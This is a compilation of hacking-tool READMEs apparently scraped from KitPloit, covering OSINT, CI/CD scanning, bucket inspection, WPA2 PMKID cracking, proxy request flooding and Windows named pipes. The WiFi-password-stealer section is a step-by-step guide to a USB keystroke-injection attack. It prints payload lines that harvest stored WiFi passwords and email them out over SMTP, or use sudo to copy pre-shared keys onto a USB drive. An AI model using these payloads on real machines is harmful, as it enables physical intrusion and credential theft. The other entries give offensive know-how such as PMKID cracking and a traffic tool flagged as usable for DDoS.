    • https://koz.io/using-frida-on-android-without-root/
    • https://github.com/sensepost/objection/wiki/Patching-Android-Applications
    • https://nowsecure.com/blog/2020/01/02/how-to-conduct-jailed-testing-with-frida/

    Security Warning

    This tool is not secure and may include some security vulnerabilities so make sure to isolate the webpage from potential hackers.

    LICENCE

    MIT



    Skytrack - Planespotting And Aircraft OSINT Tool Made Using Python

    By: Zion3R

    About

    skytrack is a command-line based plane spotting and aircraft OSINT reconnaissanceΒ tool made using Python. It can gather aircraft information using various data sources, generate a PDF report for a specified aircraft, and convert between ICAO and Tail Number designations. Whether you are a hobbyist plane spotter or an experienced aircraft analyst, skytrack can help you identify and enumerate aircraft for general purposeΒ reconnaissance.


    What is Planespotting & Aircraft OSINT?

    Planespotting is the art of tracking down and observing aircraft. While planespotting mostly consists of photography and videography of aircraft, aircraft informationΒ gathering and OSINT is a crucial step in the planespotting process. OSINT (Open Source Intelligence) describes a methodology of using publicy accessible data sources to obtain data about a specific subject β€” in this case planes!

    Aircraft Information

    • Tail Number πŸ›«
    • Aircraft Type βš™οΈ
    • ICAO24 Designation πŸ”Ž
    • Manufacturer Details πŸ› 
    • Flight Logs πŸ“„
    • Aircraft Owner ✈️
    • Model πŸ›©
    • Much more!

    Usage

    To run skytrack on your machine, follow the steps below:

    $ git clone https://github.com/ANG13T/skytrack
    $ cd skytrack
    $ pip install -r requirements.txt
    $ python skytrack.py

    skytrack works best for Python version 3.

    Preview

    Features

    skytrack features three main functions for aircraft information

    gathering and display options. They include the following:

    Aircraft Reconnaissance & OSINT

    skytrack obtains general information about the aircraft given its tail number or ICAO designator. The tool sources this information using several reliable data sets. Once the data is collected, it is displayed in the terminal within a table layout.

    PDF Aircraft Information Report

    skytrack also enables you the save the collected aircraft information into a PDF. The PDF includes all the aircraft data in a visual layout for later reference. The PDF report will be entitled "skytrack_report.pdf"

    Tail Number to ICAO Converter

    There are two standard identification formats for specifying aircraft: Tail Number and ICAO Designation. The tail number (aka N-Number) is an alphanumerical ID starting with the letter "N" used to identify aircraft. The ICAO type designation is a six-character fixed-length ID in the hexadecimal format. Both standards are highly pertinent for aircraft

    reconnaissance as they both can be used to search for a specific aircraft in data sources. However, converting them from one format to another can be rather cumbersome as it follows a tricky algorithm. To streamline this process, skytrack includes a standard converter.

    Further Explanation

    ICAO and Tail Numbers follow a mapping system like the following:

    ICAO address N-Number (Tail Number)

    a00001 N1

    a00002 N1A

    a00003 N1AA

    You can learn more about aircraft registration numbers [here](https://www.faa.gov/licenses_certificates/aircraft_certification/aircraft_registry/special_nnumbers)

    :warning: Converter only works for USA-registered aircraft

    Data Sources & APIs Used

    ICAO Aircraft Type Designators Listings

    FlightAware

    Wikipedia

    Aviation Safety Website

    Jet Photos Website

    OpenSky API

    Aviation Weather METAR

    Airport Codes Dataset

    Contributing

    skytrack is open to any contributions. Please fork the repository and make a pull request with the features or fixes you want to implement.

    Upcoming

    • Obtain Latest Flown Airports
    • Obtain Airport Information
    • Obtain ATC Frequency Information

    Support

    If you enjoyed skytrack, please consider becoming a sponsor or donating on buymeacoffee in order to fund my future projects.

    To check out my other works, visit my GitHub profile.



    MrHandler - Linux Incident Response Reporting

    By: Zion3R

    Β 


    MR.Handler is a specialized tool designed for responding to security incidents on Linux systems. It connects to target systems via SSH to execute a range of diagnostic commands, gathering crucial information such as network configurations, system logs, user accounts, and running processes. At the end of its operation, the tool compiles all the gathered data into a comprehensive HTML report. This report details both the specifics of the incident response process and the current state of the system, enabling security analysts to more effectively assess and respond to incidents.



    π—œπ—‘π—¦π—§π—”π—Ÿπ—Ÿπ—”π—§π—œπ—’π—‘ π—œπ—‘π—¦π—§π—₯π—¨π—–π—§π—œπ—’π—‘π—¦
      $ pip3 install colorama
    $ pip3 install paramiko
    $ git clone https://github.com/emrekybs/BlueFish.git
    $ cd MrHandler
    $ chmod +x MrHandler.py
    $ python3 MrHandler.py


    Report



    WEB-Wordlist-Generator - Creates Related Wordlists After Scanning Your Web Applications

    By: Zion3R


    WEB-Wordlist-Generator scans your web applications and creates related wordlists to take preliminary countermeasures against cyber attacks.


    Done
    • [x] Scan Static Files.
    • [ ] Scan Metadata Of Public Documents (pdf,doc,xls,ppt,docx,pptx,xlsx etc.)
    • [ ] Create a New Associated Wordlist with the Wordlist Given as a Parameter.

    Installation

    From Git
    git clone https://github.com/OsmanKandemir/web-wordlist-generator.git
    cd web-wordlist-generator && pip3 install -r requirements.txt
    python3 generator.py -d target-web.com

    From Dockerfile

    You can run this application on a container after build a Dockerfile.

    docker build -t webwordlistgenerator .
    docker run webwordlistgenerator -d target-web.com -o

    From DockerHub

    You can run this application on a container after pulling from DockerHub.

    docker pull osmankandemir/webwordlistgenerator:v1.0
    docker run osmankandemir/webwordlistgenerator:v1.0 -d target-web.com -o

    Usage
    -d DOMAINS [DOMAINS], --domains DOMAINS [DOMAINS] Input Multi or Single Targets. --domains target-web1.com target-web2.com
    -p PROXY, --proxy PROXY Use HTTP proxy. --proxy 0.0.0.0:8080
    -a AGENT, --agent AGENT Use agent. --agent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
    -o PRINT, --print PRINT Use Print outputs on terminal screen.



    BucketLoot - An Automated S3-compatible Bucket Inspector

    By: Zion3R


    BucketLoot is an automated S3-compatible Bucket inspector that can help users extract assets, flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text.

    The tool can scan for buckets deployed on Amazon Web Services (AWS), Google Cloud Storage (GCS), DigitalOcean Spaces and even custom domains/URLs which could be connected to these platforms. It returns the output in a JSON format, thus enabling users to parse it according to their liking or forward it to any other tool for further processing.

    BucketLoot comes with a guest mode by default, which means a user doesn't needs to specify any API tokens / Access Keys initially in order to run the scan. The tool will scrape a maximum of 1000 files that are returned in the XML response and if the storage bucket contains more than 1000 entries which the user would like to run the scanner on, they can provide platform credentials to run a complete scan. If you'd like to know more about the tool, make sure to check out our blog.

    Features

    Secret Scanning

    Scans for over 80+ unique RegEx signatures that can help in uncovering secret exposures tagged with their severity from the misconfigured storage bucket. Users have the ability to modify or add their own signatures in the regexes.json file. If you believe you have any cool signatures which might be helpful for others too and could be flagged at scale, go ahead and make a PR!

    Sensitive File Checks

    Accidental sensitive file leakages are a big problem that affects the security posture of individuals and organisations. BucketLoot comes with a 80+ unique regEx signatures list in vulnFiles.json which allows users to flag these sensitive files based on file names or extensions.

    Dig Mode

    Want to quickly check if any target website is using a misconfigured bucket that is leaking secrets or any other sensitive data? Dig Mode allows you to pass non-S3 targets and let the tool scrape URLs from response body for scanning.

    Asset Extraction

    Interested in stepping up your asset discovery game? BucketLoot extracts all the URLs/Subdomains and Domains that could be present in an exposed storage bucket, enabling you to have a chance of discovering hidden endpoints, thus giving you an edge over the other traditional recon tools.

    Searching

    The tool goes beyond just asset discovery and secret exposure scanning by letting users search for custom keywords and even Regular Expression queries which may help them find exactly what they are looking for.

    To know more about our Attack Surface Management platform, check out NVADR.



    Raven - CI/CD Security Analyzer

    By: Zion3R


    RAVEN (Risk Analysis and Vulnerability Enumeration for CI/CD) is a powerful security tool designed to perform massive scans for GitHub Actions CI workflows and digest the discovered data into a Neo4j database. Developed and maintained by the Cycode research team.

    With Raven, we were able to identify and report security vulnerabilities in some of the most popular repositories hosted on GitHub, including:

    We listed all vulnerabilities discovered using Raven in the tool Hall of Fame.


    What is Raven

    The tool provides the following capabilities to scan and analyze potential CI/CD vulnerabilities:

    • Downloader: You can download workflows and actions necessary for analysis. Workflows can be downloaded for a specified organization or for all repositories, sorted by star count. Performing this step is a prerequisite for analyzing the workflows.
    • Indexer: Digesting the downloaded data into a graph-based Neo4j database. This process involves establishing relationships between workflows, actions, jobs, steps, etc.
    • Query Library: We created a library of pre-defined queries based on research conducted by the community.
    • Reporter: Raven has a simple way of reporting suspicious findings. As an example, it can be incorporated into the CI process for pull requests and run there.

    Possible usages for Raven:

    • Scanner for your own organization's security
    • Scanning specified organizations for bug bounty purposes
    • Scan everything and report issues found to save the internet
    • Research and learning purposes

    This tool provides a reliable and scalable solution for CI/CD security analysis, enabling users to query bad configurations and gain valuable insights into their codebase's security posture.

    Why Raven

    In the past year, Cycode Labs conducted extensive research on fundamental security issues of CI/CD systems. We examined the depths of many systems, thousands of projects, and several configurations. The conclusion is clear – the model in which security is delegated to developers has failed. This has been proven several times in our previous content:

    • A simple injection scenario exposed dozens of public repositories, including popular open-source projects.
    • We found that one of the most popular frontend frameworks was vulnerable to the innovative method of branch injection attack.
    • We detailed a completely different attack vector, 3rd party integration risks, the most popular project on GitHub, and thousands more.
    • Finally, the Microsoft 365 UI framework, with more than 300 million users, is vulnerable to an additional new threat – an artifact poisoning attack.
    • Additionally, we found, reported, and disclosed hundreds of other vulnerabilities privately.

    Each of the vulnerabilities above has unique characteristics, making it nearly impossible for developers to stay up to date with the latest security trends. Unfortunately, each vulnerability shares a commonality – each exploitation can impact millions of victims.

    It was for these reasons that Raven was created, a framework for CI/CD security analysis workflows (and GitHub Actions as the first use case). In our focus, we examined complex scenarios where each issue isn't a threat on its own, but when combined, they pose a severe threat.

    Setup && Run

    To get started with Raven, follow these installation instructions:

    Step 1: Install the Raven package

    pip3 install raven-cycode

    Step 2: Setup a local Redis server and Neo4j database

    docker run -d --name raven-neo4j -p7474:7474 -p7687:7687 --env NEO4J_AUTH=neo4j/123456789 --volume raven-neo4j:/data neo4j:5.12
    docker run -d --name raven-redis -p6379:6379 --volume raven-redis:/data redis:7.2.1

    Another way to setup the environment is by running our provided docker compose file:

    git clone https://github.com/CycodeLabs/raven.git
    cd raven
    make setup

    Step 3: Run Raven Downloader

    Org mode:

    raven download org --token $GITHUB_TOKEN --org-name RavenDemo

    Crawl mode:

    raven download crawl --token $GITHUB_TOKEN --min-stars 1000

    Step 4: Run Raven Indexer

    raven index

    Step 5: Inspect the results through the reporter

    raven report --format raw

    At this point, it is possible to inspect the data in the Neo4j database, by connecting http://localhost:7474/browser/.

    Prerequisites

    • Python 3.9+
    • Docker Compose v2.1.0+
    • Docker Engine v1.13.0+

    Infrastructure

    Raven is using two primary docker containers: Redis and Neo4j. make setup will run a docker compose command to prepare that environment.

    Usage

    The tool contains three main functionalities, download and index and report.

    Download

    Download Organization Repositories

    usage: raven download org [-h] --token TOKEN [--debug] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] --org-name ORG_NAME

    options:
    -h, --help show this help message and exit
    --token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting)
    --debug Whether to print debug statements, default: False
    --redis-host REDIS_HOST
    Redis host, default: localhost
    --redis-port REDIS_PORT
    Redis port, default: 6379
    --clean-redis, -cr Whether to clean cache in the redis, default: False
    --org-name ORG_NAME Organization name to download the workflows

    Download Public Repositories

    usage: raven download crawl [-h] --token TOKEN [--debug] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--max-stars MAX_STARS] [--min-stars MIN_STARS]

    options:
    -h, --help show this help message and exit
    --token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting)
    --debug Whether to print debug statements, default: False
    --redis-host REDIS_HOST
    Redis host, default: localhost
    --redis-port REDIS_PORT
    Redis port, default: 6379
    --clean-redis, -cr Whether to clean cache in the redis, default: False
    --max-stars MAX_STARS
    Maximum number of stars for a repository
    --min-stars MIN_STARS
    Minimum number of stars for a repository, default : 1000

    Index

    usage: raven index [-h] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--neo4j-uri NEO4J_URI] [--neo4j-user NEO4J_USER] [--neo4j-pass NEO4J_PASS]
    [--clean-neo4j] [--debug]

    options:
    -h, --help show this help message and exit
    --redis-host REDIS_HOST
    Redis host, default: localhost
    --redis-port REDIS_PORT
    Redis port, default: 6379
    --clean-redis, -cr Whether to clean cache in the redis, default: False
    --neo4j-uri NEO4J_URI
    Neo4j URI endpoint, default: neo4j://localhost:7687
    --neo4j-user NEO4J_USER
    Neo4j username, default: neo4j
    --neo4j-pass NEO4J_PASS
    Neo4j password, default: 123456789
    --clean-neo4j, -cn Whether to clean cache, and index f rom scratch, default: False
    --debug Whether to print debug statements, default: False

    Report

    usage: raven report [-h] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--neo4j-uri NEO4J_URI]
    [--neo4j-user NEO4J_USER] [--neo4j-pass NEO4J_PASS] [--clean-neo4j]
    [--tag {injection,unauthenticated,fixed,priv-esc,supply-chain}]
    [--severity {info,low,medium,high,critical}] [--queries-path QUERIES_PATH] [--format {raw,json}]
    {slack} ...

    positional arguments:
    {slack}
    slack Send report to slack channel

    options:
    -h, --help show this help message and exit
    --redis-host REDIS_HOST
    Redis host, default: localhost
    --redis-port REDIS_PORT
    Redis port, default: 6379
    --clean-redis, -cr Whether to clean cache in the redis, default: False
    --neo4j-uri NEO4J_URI
    Neo4j URI endpoint, default: neo4j://localhost:7687
    --neo4j-user NEO4J_USER
    Neo4j username, default: neo4j
    --neo4j-pass NEO4J_PASS
    Neo4j password, default: 123456789
    --clean-neo4j, -cn Whether to clean cache, and index from scratch, default: False
    --tag {injection,unauthenticated,fixed,priv-esc,supply-chain}, -t {injection,unauthenticated,fixed,priv-esc,supply-chain}
    Filter queries with specific tag
    --severity {info,low,medium,high,critical}, -s {info,low,medium,high,critical}
    Filter queries by severity level (default: info)
    --queries-path QUERIES_PATH, -dp QUERIES_PATH
    Queries folder (default: library)
    --format {raw,json}, -f {raw,json}
    Report format (default: raw)

    Examples

    Retrieve all workflows and actions associated with the organization.

    raven download org --token $GITHUB_TOKEN --org-name microsoft --org-name google --debug

    Scrape all publicly accessible GitHub repositories.

    raven download crawl --token $GITHUB_TOKEN --min-stars 100 --max-stars 1000 --debug

    After finishing the download process or if interrupted using Ctrl+C, proceed to index all workflows and actions into the Neo4j database.

    raven index --debug

    Now, we can generate a report using our query library.

    raven report --severity high --tag injection --tag unauthenticated

    Rate Limiting

    For effective rate limiting, you should supply a Github token. For authenticated users, the next rate limiting applies:

    • Code search - 30 queries per minute
    • Any other API - 5000 per hour

    Research Knowledge Base

    Current Limitations

    • It is possible to run external action by referencing a folder with a Dockerfile (without action.yml). Currently, this behavior isn't supported.
    • It is possible to run external action by referencing a docker container through the docker://... URL. Currently, this behavior isn't supported.
    • It is possible to run an action by referencing it locally. This creates complex behavior, as it may come from a different repository that was checked out previously. The current behavior is trying to find it in the existing repository.
    • We aren't modeling the entire workflow structure. If additional fields are needed, please submit a pull request according to the contribution guidelines.

    Future Research Work

    • Implementation of taint analysis. Example use case - a user can pass a pull request title (which is controllable parameter) to an action parameter that is named data. That action parameter may be used in a run command: - run: echo ${{ inputs.data }}, which creates a path for a code execution.
    • Expand the research for findings of harmful misuse of GITHUB_ENV. This may utilize the previous taint analysis as well.
    • Research whether actions/github-script has an interesting threat landscape. If it is, it can be modeled in the graph.

    Want more of CI/CD Security, AppSec, and ASPM? Check out Cycode

    If you liked Raven, you would probably love our Cycode platform that offers even more enhanced capabilities for visibility, prioritization, and remediation of vulnerabilities across the software delivery.

    If you are interested in a robust, research-driven Pipeline Security, Application Security, or ASPM solution, don't hesitate to get in touch with us or request a demo using the form https://cycode.com/book-a-demo/.



    Pmkidcracker - A Tool To Crack WPA2 Passphrase With PMKID Value Without Clients Or De-Authentication

    By: Zion3R


    This program is a tool written in Python to recover the pre-shared key of a WPA2 WiFi network without any de-authentication or requiring any clients to be on the network. It targets the weakness of certain access points advertising the PMKID value in EAPOL message 1.


    Program Usage

    python pmkidcracker.py -s <SSID> -ap <APMAC> -c <CLIENTMAC> -p <PMKID> -w <WORDLIST> -t <THREADS(Optional)>

    NOTE: apmac, clientmac, pmkid must be a hexstring, e.g b8621f50edd9

    How PMKID is Calculated

    The two main formulas to obtain a PMKID are as follows:

    1. Pairwise Master Key (PMK) Calculation: passphrase + salt(ssid) => PBKDF2(HMAC-SHA1) of 4096 iterations
    2. PMKID Calculation: HMAC-SHA1[pmk + ("PMK Name" + bssid + clientmac)]

    This is just for understanding, both are already implemented in find_pw_chunk and calculate_pmkid.

    Obtaining the PMKID

    Below are the steps to obtain the PMKID manually by inspecting the packets in WireShark.

    *You may use Hcxtools or Bettercap to quickly obtain the PMKID without the below steps. The manual way is for understanding.

    To obtain the PMKID manually from wireshark, put your wireless antenna in monitor mode, start capturing all packets with airodump-ng or similar tools. Then connect to the AP using an invalid password to capture the EAPOL 1 handshake message. Follow the next 3 steps to obtain the fields needed for the arguments.

    Open the pcap in WireShark:

    • Filter with wlan_rsna_eapol.keydes.msgnr == 1 in WireShark to display only EAPOL message 1 packets.
    • In EAPOL 1 pkt, Expand IEEE 802.11 QoS Data Field to obtain AP MAC, Client MAC
    • In EAPOL 1 pkt, Expand 802.1 Authentication > WPA Key Data > Tag: Vendor Specific > PMKID is below

    If access point is vulnerable, you should see the PMKID value like the below screenshot:

    Demo Run

    Disclaimer

    This tool is for educational and testing purposes only. Do not use it to exploit the vulnerability on any network that you do not own or have permission to test. The authors of this script are not responsible for any misuse or damage caused by its use.



    PhantomCrawler - Boost Website Hits By Generating Requests From Multiple Proxy IPs

    By: Zion3R


    PhantomCrawler allows users to simulate website interactions through different proxy IP addresses. It leverages Python, requests, and BeautifulSoup to offer a simple and effective way to test website behaviour under varied proxy configurations.

    Features:

    • Utilizes a list of proxy IP addresses from a specified file.
    • Supports both HTTP and HTTPS proxies.
    • Allows users to input the target website URL, proxy file path, and a static port.
    • Makes HTTP requests to the specified website using each proxy.
    • Parses HTML content to extract and visit links on the webpage.

    Usage:

    • POC Testing: Simulate website interactions to assess functionality under different proxy setups.
    • Web Traffic Increase: Boost website hits by generating requests from multiple proxy IPs.
    • Proxy Rotation Testing: Evaluate the effectiveness of rotating proxy IPs.
    • Web Scraping Testing: Assess web scraping tasks under different proxy configurations.
    • DDoS Awareness: Caution: The tool has the potential for misuse as a DDoS tool. Ensure responsible and ethical use.

    Get New Proxies with port and add in proxies.txt in this format 50.168.163.176:80
    • You can add it from here: https://free-proxy-list.net/ these free proxies are not validated some might not work so first validate these proxies before adding.

    How to Use:

    1. Clone the repository:
    git clone https://github.com/spyboy-productions/PhantomCrawler.git
    1. Install dependencies:
    pip3 install -r requirements.txt
    1. Run the script:
    python3 PhantomCrawler.py

    Disclaimer: PhantomCrawler is intended for educational and testing purposes only. Users are cautioned against any misuse, including potential DDoS activities. Always ensure compliance with the terms of service of websites being tested and adhere to ethical standards.


    Snapshots:

    If you find this GitHub repo useful, please consider giving it a star!Β 



    WiFi-password-stealer - Simple Windows And Linux Keystroke Injection Tool That Exfiltrates Stored WiFi Data (SSID And Password)

    By: Zion3R


    Have you ever watched a film where a hacker would plug-in, seemingly ordinary, USB drive into a victim's computer and steal data from it? - A proper wet dream for some.

    Disclaimer: All content in this project is intended for security research purpose only.

    Β 

    Introduction

    During the summer of 2022, I decided to do exactly that, to build a device that will allow me to steal data from a victim's computer. So, how does one deploy malware and exfiltrate data? In the following text I will explain all of the necessary steps, theory and nuances when it comes to building your own keystroke injection tool. While this project/tutorial focuses on WiFi passwords, payload code could easily be altered to do something more nefarious. You are only limited by your imagination (and your technical skills).

    Setup

    After creating pico-ducky, you only need to copy the modified payload (adjusted for your SMTP details for Windows exploit and/or adjusted for the Linux password and a USB drive name) to the RPi Pico.

    Prerequisites

    • Physical access to victim's computer.

    • Unlocked victim's computer.

    • Victim's computer has to have an internet access in order to send the stolen data using SMTP for the exfiltration over a network medium.

    • Knowledge of victim's computer password for the Linux exploit.

    Requirements - What you'll need


    • Raspberry Pi Pico (RPi Pico)
    • Micro USB to USB Cable
    • Jumper Wire (optional)
    • pico-ducky - Transformed RPi Pico into a USB Rubber Ducky
    • USB flash drive (for the exploit over physical medium only)


    Note:

    • It is possible to build this tool using Rubber Ducky, but keep in mind that RPi Pico costs about $4.00 and the Rubber Ducky costs $80.00.

    • However, while pico-ducky is a good and budget-friedly solution, Rubber Ducky does offer things like stealthiness and usage of the lastest DuckyScript version.

    • In order to use Ducky Script to write the payload on your RPi Pico you first need to convert it to a pico-ducky. Follow these simple steps in order to create pico-ducky.

    Keystroke injection tool

    Keystroke injection tool, once connected to a host machine, executes malicious commands by running code that mimics keystrokes entered by a user. While it looks like a USB drive, it acts like a keyboard that types in a preprogrammed payload. Tools like Rubber Ducky can type over 1,000 words per minute. Once created, anyone with physical access can deploy this payload with ease.

    Keystroke injection

    The payload uses STRING command processes keystroke for injection. It accepts one or more alphanumeric/punctuation characters and will type the remainder of the line exactly as-is into the target machine. The ENTER/SPACE will simulate a press of keyboard keys.

    Delays

    We use DELAY command to temporarily pause execution of the payload. This is useful when a payload needs to wait for an element such as a Command Line to load. Delay is useful when used at the very beginning when a new USB device is connected to a targeted computer. Initially, the computer must complete a set of actions before it can begin accepting input commands. In the case of HIDs setup time is very short. In most cases, it takes a fraction of a second, because the drivers are built-in. However, in some instances, a slower PC may take longer to recognize the pico-ducky. The general advice is to adjust the delay time according to your target.

    Exfiltration

    Data exfiltration is an unauthorized transfer of data from a computer/device. Once the data is collected, adversary can package it to avoid detection while sending data over the network, using encryption or compression. Two most common way of exfiltration are:

    • Exfiltration over the network medium.
      • This approach was used for the Windows exploit. The whole payload can be seen here.

    • Exfiltration over a physical medium.
      • This approach was used for the Linux exploit. The whole payload can be seen here.

    Windows exploit

    In order to use the Windows payload (payload1.dd), you don't need to connect any jumper wire between pins.

    Sending stolen data over email

    Once passwords have been exported to the .txt file, payload will send the data to the appointed email using Yahoo SMTP. For more detailed instructions visit a following link. Also, the payload template needs to be updated with your SMTP information, meaning that you need to update RECEIVER_EMAIL, SENDER_EMAIL and yours email PASSWORD. In addition, you could also update the body and the subject of the email.

    STRING Send-MailMessage -To 'RECEIVER_EMAIL' -from 'SENDER_EMAIL' -Subject "Stolen data from PC" -Body "Exploited data is stored in the attachment." -Attachments .\wifi_pass.txt -SmtpServer 'smtp.mail.yahoo.com' -Credential $(New-Object System.Management.Automation.PSCredential -ArgumentList 'SENDER_EMAIL', $('PASSWORD' | ConvertTo-SecureString -AsPlainText -Force)) -UseSsl -Port 587

     Note:

    • After sending data over the email, the .txt file is deleted.

    • You can also use some an SMTP from another email provider, but you should be mindful of SMTP server and port number you will write in the payload.

    • Keep in mind that some networks could be blocking usage of an unknown SMTP at the firewall.

    Linux exploit

    In order to use the Linux payload (payload2.dd) you need to connect a jumper wire between GND and GPIO5 in order to comply with the code in code.py on your RPi Pico. For more information about how to setup multiple payloads on your RPi Pico visit this link.

    Storing stolen data to USB flash drive

    Once passwords have been exported from the computer, data will be saved to the appointed USB flash drive. In order for this payload to function properly, it needs to be updated with the correct name of your USB drive, meaning you will need to replace USBSTICK with the name of your USB drive in two places.

    STRING echo -e "Wireless_Network_Name Password\n--------------------- --------" > /media/$(hostname)/USBSTICK/wifi_pass.txt

    STRING done >> /media/$(hostname)/USBSTICK/wifi_pass.txt

    In addition, you will also need to update the Linux PASSWORD in the payload in three places. As stated above, in order for this exploit to be successful, you will need to know the victim's Linux machine password, which makes this attack less plausible.

    STRING echo PASSWORD | sudo -S echo

    STRING do echo -e "$(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=ssid=).*') \t\t\t\t $(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=psk=).*')"

    Bash script

    In order to run the wifi_passwords_print.sh script you will need to update the script with the correct name of your USB stick after which you can type in the following command in your terminal:

    echo PASSWORD | sudo -S sh wifi_passwords_print.sh USBSTICK

    where PASSWORD is your account's password and USBSTICK is the name for your USB device.

    Quick overview of the payload

    NetworkManager is based on the concept of connection profiles, and it uses plugins for reading/writing data. It uses .ini-style keyfile format and stores network configuration profiles. The keyfile is a plugin that supports all the connection types and capabilities that NetworkManager has. The files are located in /etc/NetworkManager/system-connections/. Based on the keyfile format, the payload uses the grep command with regex in order to extract data of interest. For file filtering, a modified positive lookbehind assertion was used ((?<=keyword)). While the positive lookbehind assertion will match at a certain position in the string, sc. at a position right after the keyword without making that text itself part of the match, the regex (?<=keyword).* will match any text after the keyword. This allows the payload to match the values after SSID and psk (pre-shared key) keywords.

    For more information about NetworkManager here is some useful links:

    Exfiltrated data formatting

    Below is an example of the exfiltrated and formatted data from a victim's machine in a .txt file.

    Wireless_Network_Name Password
    --------------------- --------
    WLAN1 pass1
    WLAN2 pass2
    WLAN3 pass3

    USB Mass Storage Device Problem

    One of the advantages of Rubber Ducky over RPi Pico is that it doesn't show up as a USB mass storage device once plugged in. Once plugged into the computer, all the machine sees it as a USB keyboard. This isn't a default behavior for the RPi Pico. If you want to prevent your RPi Pico from showing up as a USB mass storage device when plugged in, you need to connect a jumper wire between pin 18 (GND) and pin 20 (GPIO15). For more details visit this link.

    ο’‘ Tip:

    • Upload your payload to RPi Pico before you connect the pins.
    • Don't solder the pins because you will probably want to change/update the payload at some point.

    Payload Writer

    When creating a functioning payload file, you can use the writer.py script, or you can manually change the template file. In order to run the script successfully you will need to pass, in addition to the script file name, a name of the OS (windows or linux) and the name of the payload file (e.q. payload1.dd). Below you can find an example how to run the writer script when creating a Windows payload.

    python3 writer.py windows payload1.dd

    Limitations/Drawbacks

    • This pico-ducky currently works only on Windows OS.

    • This attack requires physical access to an unlocked device in order to be successfully deployed.

    • The Linux exploit is far less likely to be successful, because in order to succeed, you not only need physical access to an unlocked device, you also need to know the admins password for the Linux machine.

    • Machine's firewall or network's firewall may prevent stolen data from being sent over the network medium.

    • Payload delays could be inadequate due to varying speeds of different computers used to deploy an attack.

    • The pico-ducky device isn't really stealthy, actually it's quite the opposite, it's really bulky especially if you solder the pins.

    • Also, the pico-ducky device is noticeably slower compared to the Rubber Ducky running the same script.

    • If the Caps Lock is ON, some of the payload code will not be executed and the exploit will fail.

    • If the computer has a non-English Environment set, this exploit won't be successful.

    • Currently, pico-ducky doesn't support DuckyScript 3.0, only DuckyScript 1.0 can be used. If you need the 3.0 version you will have to use the Rubber Ducky.

    To-Do List

    • Fix Caps Lock bug.
    • Fix non-English Environment bug.
    • Obfuscate the command prompt.
    • Implement exfiltration over a physical medium.
    • Create a payload for Linux.
    • Encode/Encrypt exfiltrated data before sending it over email.
    • Implement indicator of successfully completed exploit.
    • Implement command history clean-up for Linux exploit.
    • Enhance the Linux exploit in order to avoid usage of sudo.


    Top 20 Most Popular Hacking Tools in 2023

    By: Zion3R

    As last year, this year we made a ranking with the most popular tools between January and December 2023.

    The tools of this year encompass a diverse range of cybersecurity disciplines, including AI-Enhanced Penetration Testing, Advanced Vulnerability Management, Stealth Communication Techniques, Open-Source General Purpose Vulnerability Scanning, and more.

    Without going into further details, we have prepared a useful list of the most popular tools in Kitploit 2023:


    1. PhoneSploit-Pro - An All-In-One Hacking Tool To Remotely Exploit Android Devices Using ADB And Metasploit-Framework To Get A Meterpreter Session


    2. Gmailc2 - A Fully Undetectable C2 Server That Communicates Via Google SMTP To Evade Antivirus Protections And Network Traffic Restrictions


    3. Faraday - Open Source Vulnerability Management Platform


    4. CloakQuest3r - Uncover The True IP Address Of Websites Safeguarded By Cloudflare


    5. Killer - Is A Tool Created To Evade AVs And EDRs Or Security Tools


    6. Geowifi - Search WiFi Geolocation Data By BSSID And SSID On Different Public Databases


    7. Waf-Bypass - Check Your WAF Before An Attacker Does


    8. PentestGPT - A GPT-empowered Penetration Testing Tool


    9. Sirius - First Truly Open-Source General Purpose Vulnerability Scanner


    10. LSMS - Linux Security And Monitoring Scripts


    11. GodPotato - Local Privilege Escalation Tool From A Windows Service Accounts To NT AUTHORITY\SYSTEM


    12. Bypass-403 - A Simple Script Just Made For Self Use For Bypassing 403


    13. ThunderCloud - Cloud Exploit Framework


    14. GPT_Vuln-analyzer - Uses ChatGPT API And Python-Nmap Module To Use The GPT3 Model To Create Vulnerability Reports Based On Nmap Scan Data


    15. Kscan - Simple Asset Mapping Tool


    16. RedTeam-Physical-Tools - Red Team Toolkit - A Curated List Of Tools That Are Commonly Used In The Field For Physical Security, Red Teaming, And Tactical Covert Entry


    17. DNSWatch - DNS Traffic Sniffer and Analyzer


    18. IpGeo - Tool To Extract IP Addresses From Captured Network Traffic File


    19. TelegramRAT - Cross Platform Telegram Based RAT That Communicates Via Telegram To Evade Network Restrictions


    20. XSS-Exploitation-Tool - An XSS Exploitation Tool





    Happy New Year wishes the KitPloit team!


    PipeViewer - A Tool That Shows Detailed Information About Named Pipes In Windows

    By: Zion3R


    A GUI tool for viewing Windows Named Pipes and searching for insecure permissions.

    The tool was published as part of a research about Docker named pipes:
    "Breaking Docker Named Pipes SYSTEMatically: Docker Desktop Privilege Escalation – Part 1"
    "Breaking Docker Named Pipes SYSTEMatically: Docker Desktop Privilege Escalation – Part 2"

    Overview

    PipeViewer is a GUI tool that allows users to view details about Windows Named pipes and their permissions. It is designed to be useful for security researchers who are interested in searching for named pipes with weak permissions or testing the security of named pipes. With PipeViewer, users can easily view and analyze information about named pipes on their systems, helping them to identify potential security vulnerabilities and take appropriate steps to secure their systems.


    Usage

    Double-click the EXE binary and you will get the list of all named pipes.

    Build

    We used Visual Studio to compile it.
    When downloading it from GitHub you might get error of block files, you can use PowerShell to unblock them:

    Get-ChildItem -Path 'D:\tmp\PipeViewer-main' -Recurse | Unblock-File

    Warning

    We built the project and uploaded it so you can find it in the releases.
    One problem is that the binary will trigger alerts from Windows Defender because it uses the NtObjerManager package which is flagged as virus.
    Note that James Forshaw talked about it here.
    We can't change it because we depend on third-party DLL.

    Features

    • A detailed overview of named pipes.
    • Filter\highlight rows based on cells.
    • Bold specific rows.
    • Export\Import to\from JSON.
    • PipeChat - create a connection with available named pipes.

    Demo

    PipeViewer3_v1.0.mp4

    Credit

    We want to thank James Forshaw (@tyranid) for creating the open source NtApiDotNet which allowed us to get information about named pipes.

    License

    Copyright (c) 2023 CyberArk Software Ltd. All rights reserved
